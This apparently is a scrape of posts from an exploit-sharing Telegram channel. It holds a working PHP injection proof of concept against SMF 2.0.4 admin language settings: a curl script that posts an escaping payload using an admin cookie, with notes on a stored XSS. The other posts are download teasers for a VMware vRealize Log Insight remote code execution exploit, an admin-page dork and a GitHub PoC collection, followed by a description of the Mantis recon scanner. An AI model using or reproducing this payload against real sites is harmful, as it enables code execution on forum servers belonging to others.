👩‍💻 VMware vRealize Log Insight Unauthenticated Remote Code Execution

⬇️ Download
🔒 LearnExploit

#VMware #Remote #Code
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/LearnExploit

SMF 2.0.4 admin payload code execution

⚪️ proof of concept that latest SMF (2.0.4) can be
exploited by php injection.

⚪️ payload code must escape from \', so you should try with something like that:

⚪️ p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.

⚪️ For character_set - another story, as far as I remember, because here we have

⚪️ a nice stored xss. ;)

⚪️ to successfully exploit smf 2.0.4 we need correct admin's cookie:

Code:

<?php
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>

#Execution #XSS #Payload
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/LearnExploit

Dork for Admin page

#Dork #Find #Admin #Page
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/LearnExploit

PoC auto collect from GitHub

⚠️ Be careful Malware ⚠️

😎 From 1999 to 2024

😸 Github

#CVE #POC #Github #Repo
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/LearnExploit

🐉 Mantis 🐉

💬
Mantis is a command-line framework designed to automate the workflow of asset discovery, reconnaissance, and scanning. It takes the top-level domains as input, then seamlessly progresses to discovering corresponding assets, including subdomains and certificates. The tool performs reconnaissance on active assets and concludes with a comprehensive scan for vulnerabilities, secrets, misconfigurations and phishing domains - all powered by a blend of open-source and custom tools.

📊 Features:
⚪️ Automated Discovery, Recon & Scan
⚪️ Distributed Scanning (split a single scan across multiple machines)
⚪️ Super-Easy Scan Customisation
⚪️ Dashboard Support
⚪️ Vulnerability Management
⚪️ Advanced Alerting
⚪️ DNS Service Integration
⚪️ Integrate new tool (existing and custom) in minutes

🖱 Click here to know more about the features in detail.

🔼 Installation:

cd mantis/setup/docker

🍏 Macos:

./docker-setup-macos.sh

👩‍💻 Ubuntu:

./docker-setup-ubuntu.sh

😸 Github

⬇️ Download
🔒 LearnExploit

#Automates #Discovery #Vulnerability #Scanning
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/LearnExploit